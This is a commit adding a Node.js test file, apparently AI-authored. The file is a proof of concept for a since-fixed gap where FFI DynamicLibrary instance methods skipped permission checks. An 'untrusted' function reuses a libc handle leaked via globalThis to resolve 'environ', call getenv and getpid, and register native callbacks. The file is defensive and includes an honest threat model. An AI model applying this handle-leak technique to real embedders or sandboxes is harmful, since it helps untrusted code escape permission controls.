test: add FFI permission-bypass PoC

Adds test/ffi/exploit-poc.js that documents the DynamicLibrary
instance-method permission gap closed in src/node_ffi.cc. The PoC
opens libc, simulates a handle leak via globalThis, and from a
separate "untrusted" function exercises every instance method
(getSymbol, getFunction, native invocation, register/ref/unref/
unregister callbacks, close) that previously ran without a
THROW_IF_INSUFFICIENT_PERMISSIONS check.

The file documents the realistic threat model (handle leakage,
embedder contexts, --permission-audit coverage) and explicitly
notes that Node.js's process-wide permission model prevents this
from being a userland-exploitable RCE on its own.

Author: claude

test/ffi/exploit-poc.js

@@ -0,0 +1,129 @@
+// Flags: --permission --experimental-ffi --allow-ffi --allow-fs-read=*
+//
+// Proof-of-concept: FFI DynamicLibrary instance-method permission gap
+// ==================================================================
+//
+// SCOPE:
+//   This PoC demonstrates the defense-in-depth gap closed by the fix in
+//   src/node_ffi.cc. Before the fix, every instance method of
+//   DynamicLibrary (InvokeFunction, GetFunction, GetSymbol, etc.) skipped
+//   the THROW_IF_INSUFFICIENT_PERMISSIONS check that DynamicLibrary::New
+//   and the raw helpers in src/ffi/data.cc already had.
+//
+// HONEST THREAT MODEL:
+//   Node's permission model is process-wide and fixed at startup. With
+//   `--permission` but no `--allow-ffi`, the constructor throws, so
+//   userland JS cannot normally obtain a DynamicLibrary handle. In that
+//   sense, the missing checks are NOT a directly userland-exploitable RCE.
+//
+//   The gap matters in the following realistic cases:
+//     1. Handle leakage from trusted into untrusted code within the same
+//        process (modules with different trust levels; post-compromise
+//        lateral movement; prototype pollution that exposes a handle
+//        stashed on a shared prototype or on `globalThis`).
+//     2. Embedders (Electron, CLIs that run user scripts) that open a
+//        library in a privileged bootstrap phase and later run user code
+//        with a stricter permission posture.
+//     3. `--permission-audit` coverage: the diagnostics channel
+//        `node:permission-model:ffi` receives an event on every denied
+//        check. Pre-fix, instance-method calls silently skipped the
+//        check, so auditors saw no event for them, producing an incomplete
+//        audit trail.
+//
+// WHAT THIS SCRIPT DOES:
+//   1. Opens libc legitimately (requires --allow-ffi).
+//   2. Stashes the handle on globalThis to simulate handle leakage.
+//   3. Drops into "untrusted" code that pulls the handle from globalThis
+//      and exercises every instance method.
+//   4. Observes whether each call hits the FFI permission check by
+//      watching the `node:permission-model:ffi` diagnostics channel.
+//
+//   To see the difference, flip `is_granted` for kFFI to `false` locally
+//   (e.g. by patching FFIPermission::is_granted to `return false;` in a
+//   debug build). With the fix applied, every instance method below
+//   will throw ERR_ACCESS_DENIED; without the fix, only the constructor
+//   throws and all subsequent instance calls run unchecked.
+//
+'use strict';
+
+const assert = require('node:assert');
+const dc = require('node:diagnostics_channel');
+const common = require('../common');
+
+common.skipIfFFIMissing();
+
+const ffi = require('node:ffi');
+
+const events = [];
+dc.subscribe('node:permission-model:ffi', (msg) => {
+  events.push({ permission: msg.permission, resource: msg.resource });
+});
+
+// Pick a platform-appropriate libc path.
+let libcPath;
+switch (process.platform) {
+  case 'linux':   libcPath = 'libc.so.6'; break;
+  case 'darwin':  libcPath = '/usr/lib/libSystem.dylib'; break;
+  case 'win32':   libcPath = 'msvcrt.dll'; break;
+  default:        libcPath = 'libc.so.6'; break;
+}
+
+// ---- "Trusted" bootstrap: opens the library with FFI permission ------------
+function trustedBootstrap() {
+  const lib = new ffi.DynamicLibrary(libcPath);
+  // Intentionally leak the handle to simulate a shared-state escape.
+  globalThis.__LEAKED_FFI_HANDLE__ = lib;
+  return lib;
+}
+
+// ---- "Untrusted" attacker: reuses the leaked handle ------------------------
+function untrustedAttacker() {
+  const lib = globalThis.__LEAKED_FFI_HANDLE__;
+  assert.ok(lib, 'no leaked handle');
+
+  // Each of the instance-method calls below lacked THROW_IF_INSUFFICIENT_PERMISSIONS
+  // before the fix. After the fix, they all route through the FFI permission
+  // scope and will be surfaced on the diagnostics channel on denial.
+
+  // 1. Symbol resolution (returns a raw native address as a BigInt).
+  const environPtr = lib.getSymbol('environ');
+  console.log('getSymbol("environ") ->', environPtr.toString(16));
+
+  // 2. Build callable FFI wrappers for libc functions.
+  const getpid = lib.getFunction('getpid', { returns: 'int32', arguments: [] });
+  const getenv = lib.getFunction('getenv',
+                                 { returns: 'string', arguments: ['string'] });
+
+  // 3. Invoke native code (the critical call: InvokeFunction had no check).
+  console.log('native getpid() =>', getpid());
+  console.log('native getenv("PATH") =>', (getenv('PATH') || '').slice(0, 60));
+
+  // 4. Registering a callback allocates an executable trampoline.
+  const cbAddr = lib.registerCallback(
+    { returns: 'int32', arguments: ['int32'] },
+    (x) => x + 1,
+  );
+  console.log('registerCallback trampoline =>', cbAddr.toString(16));
+
+  // 5. Callback refcount management.
+  lib.refCallback(cbAddr);
+  lib.unrefCallback(cbAddr);
+  lib.unregisterCallback(cbAddr);
+
+  // 6. Close is also an instance method; pre-fix it was unchecked and could
+  //    invalidate callbacks retained by foreign code still on the call stack.
+  lib.close();
+}
+
+trustedBootstrap();
+untrustedAttacker();
+
+console.log('\nDiagnostics-channel events observed:', events.length);
+console.log(events);
+
+// When run with `--permission --experimental-ffi --allow-ffi`, all calls are
+// granted and the channel stays silent (events.length === 0). To see the
+// difference made by the fix, rebuild with the FFIPermission::is_granted
+// hard-coded to return false for kFFI: post-fix every instance method above
+// throws with code 'ERR_ACCESS_DENIED' and each denial publishes an event
+// (events.length >= 9). Pre-fix, only the constructor publishes.